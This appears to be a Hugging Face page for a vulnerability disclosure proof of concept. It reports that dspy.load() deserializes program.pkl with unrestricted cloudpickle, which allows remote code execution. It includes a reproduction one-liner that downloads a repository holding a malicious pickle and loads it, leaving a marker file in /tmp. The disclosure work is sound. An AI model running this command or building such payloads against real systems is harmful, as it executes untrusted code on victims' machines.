DSPy cloudpickle.load() RCE PoC

Security research PoC for huntr submission.

Vulnerability: dspy.load() in dspy/utils/saving.py:23 loads program.pkl with cloudpickle.load() (= unrestricted pickle.load). No weights_only, no restrictions. Any __reduce__-based payload in program.pkl executes at load time.

Affected version: dspy-ai 2.6.27 (latest)

Reproduction

pip install dspy-ai
python3 -c "
import dspy
from huggingface_hub import snapshot_download
path = snapshot_download('th3-j0k3r/dspy-cloudpickle-poc')
dspy.load(path)
print(open('/tmp/dspy_rce_hf.txt').read())
"
Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support